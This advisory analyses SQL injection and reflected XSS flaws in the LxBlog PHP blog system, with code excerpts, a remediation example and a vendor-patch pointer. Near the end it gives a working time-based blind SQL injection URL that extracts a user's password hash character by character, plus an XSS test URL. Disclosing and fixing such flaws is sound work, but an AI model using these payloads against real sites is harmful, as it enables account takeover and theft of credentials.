Affected Versions:
LxBlog
Program introduction:
LxBlog is a multi-user blog system developed by PHPWind on a PHP + MySQL platform. It emphasises interaction between the whole site and individual users, and provides a personal homepage system, an independent second-level domain name system, a flexible user template system, and rich friend-circle and album functions.
Vulnerability Analysis:
Code Analysis snippet:
==================================== Code ====================================
// user/tag.php
<?php
!function_exists('usermsg') && exit('Forbidden');
!in_array($type, $item_type) && exit;
// $type and $item_type are never initialised in this file.
require_once(R_P . 'mod/charset_mod.php');
foreach ($_POST as $key => $value) {
    ${'utf8_' . $key} = $value;
    ${$key} = $db_charset != 'UTF-8' ? convert_charset('UTF-8', $db_charset, $value) : $value;
}
if ($job == 'add') {
    ...... // part of the code omitted
} elseif ($job == 'modify') {
    $tagnum = "{$type}num";
    $touchtagdb = $db->get_one("SELECT k.tags, i.uid FROM pw_{$type} k LEFT JOIN pw_items i ON i.itemid = k.itemid WHERE k.itemid = $itemid");
    // $type is interpolated straight into the query that is sent to the database.
    $touchtagdb['uid'] != $admin_uid && exit;
    ...... // part of the code omitted
==================================== Code ====================================
The first line of the file, `!function_exists('usermsg') && exit('Forbidden');`, prevents the file from being requested directly, but user_index.php can be used to include it and execute it. See the following code.
==================================== Code ====================================
// user_index.php
<?php
...... // part of the code omitted
require_once(R_P . 'user/global.php');
require_once(R_P . 'user/top.php');
if (!$action) {
    ...... // part of the code omitted
} elseif ($action && file_exists(R_P . "user/$action.php")) {
    $basename = "$user_file?action=$action";
    require_once(Pcv(R_P . "user/$action.php"));
    // Submitting action=tag reaches the vulnerable file through this include.
}
...... // part of the code omitted
==================================== Code ====================================
This shows that the vulnerable code can be reached, but we still need to consider whether the uninitialised variables depend on register_globals being enabled. Fortunately, user_index.php includes user/global.php at the very beginning:
==================================== Code ====================================
// user/global.php
<?
...... // part of the code omitted
if (!in_array($action, array('blogdata', 'comment', 'itemcp', 'post', 'userinfo'))) {
    // blogdata, comment, itemcp, post, userinfo, global, top
    // The submitted action=tag is not in the array above, so the following code runs and
    // imports request parameters into global variables regardless of the register_globals setting.
    foreach ($_POST as $_key => $_value) {
        !ereg('^\_', $_key) && strlen(${$_key}) < 1 && ${$_key} = $_POST[$_key];
    }
    foreach ($_GET as $_key => $_value) {
        !ereg('^\_', $_key) && strlen(${$_key}) < 1 && ${$_key} = $_GET[$_key];
    }
}
...... // part of the code omitted
==================================== Code ====================================
Through the above analysis we can control the values of both $type and $item_type, but two points need attention:
The first is satisfying the check in_array($type, $item_type). Since both variables come from the request, we can simply assign $type and $item_type[] the same value.
LxBlog database error-handling code
==================================== Code ====================================
function DB_ERROR($msg) {
    global $db_blogname, $REQUEST_URI;
    $sqlerror = mysql_error();
    $sqlerrno = mysql_errno();
    //ob_end_clean();
    echo "<table style=TABLE-LAYOUT: fixed; WORD-WRAP: break-word><tr><td>$msg";
    echo "<br><B>The URL Is</B>:<br>http://$_SERVER[HTTP_HOST]$REQUEST_URI";
    echo "<br><B>MySQL Server Error</B>:<br>$sqlerror ($sqlerrno)";
    echo "<br><B>You Can Get Help In</B>:<br><a target=_blank href=http://www.phpwind.net><B>http://www.phpwind.net</B></a>";
    echo "</td></tr></table>";
    exit;
}
==================================== Code ====================================
The function echoes the URL that caused the database error (and the MySQL error text) back to the client without escaping the output, which results in an XSS vulnerability.
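The two defects described above (a request-controlled $type reaching a table name through a check that the request also controls, and DB_ERROR echoing request data unescaped) can be closed as shown in this added example; it is not LxBlog's code or the vendor's patch, and $ALLOWED_ITEM_TYPES, resolve_item_table() and safe_db_error() are names assumed for the illustration.

```php
<?php
// Added example, not LxBlog's code or the vendor's patch. The item-type list and the
// helper names are assumptions for this illustration.

// 1. The allowed item types live in server-side code, never in the request, and the
//    table name is built from the whitelist entry rather than from the submitted string.
$ALLOWED_ITEM_TYPES = array('blog', 'album', 'photo'); // assumed list; use the real set

function resolve_item_table($type, array $allowed) {
    // strict comparison: a value that is only loosely equal is still rejected
    $idx = array_search($type, $allowed, true);
    return $idx === false ? null : 'pw_' . $allowed[$idx];
}

// 2. The error page escapes everything that originated in the request.
function safe_db_error($msg, $sqlerror, $sqlerrno) {
    $url = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $h = function ($s) { return htmlspecialchars($s, ENT_QUOTES, 'UTF-8'); };
    echo '<table><tr><td>' . $h($msg);
    echo '<br><b>The URL Is</b>:<br>' . $h($url);
    // the MySQL error text can also contain request-supplied input, so escape it too
    echo '<br><b>MySQL Server Error</b>:<br>' . $h($sqlerror) . ' (' . (int)$sqlerrno . ')';
    echo '</td></tr></table>';
    exit;
}

// Explicit reads from the request replace the global-import loops of global.php, so an
// unset variable can no longer be filled in by the client.
$type   = isset($_REQUEST['type'])   ? (string)$_REQUEST['type']   : '';
$itemid = isset($_REQUEST['itemid']) ? (int)$_REQUEST['itemid']    : 0;

$table = resolve_item_table($type, $ALLOWED_ITEM_TYPES);
if ($table === null || $itemid <= 0) {
    exit('Forbidden');
}
$sql = "SELECT k.tags, i.uid FROM {$table} k LEFT JOIN pw_items i ON i.itemid = k.itemid"
     . " WHERE k.itemid = {$itemid}";
// $sql now contains only a whitelisted table name and an integer.
```

Escaping is the minimum fix for the error page; in production the raw MySQL error should be logged server-side and only a generic message shown to the client.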
Vulnerability exploitation:
SQL injection test:
==================================== Poc =====================================
// Checks whether the ASCII value of the first password character of the user with uid 1 is greater than 0
http://blog.xxx.com/user_index.php?action=tag&job=modify&type=blog k left join pw_user I ON 1=1 WHERE I.uid=1 AND if(ASCII(SUBSTRING(password,1,1)>0),sleep(10),1)/*&item_type[]=blog k left join pw_user I ON 1=1 WHERE I.uid=1 AND if(ASCII(SUBSTRING(password,1,1)>0),sleep(10),1)/*
==================================== Poc =====================================
XSS test:
==================================== Poc =====================================
http://www.lxblog.net/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]
==================================== Poc =====================================
Solution:
Vendor patch:
LxBlog
----------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.lxblog.net/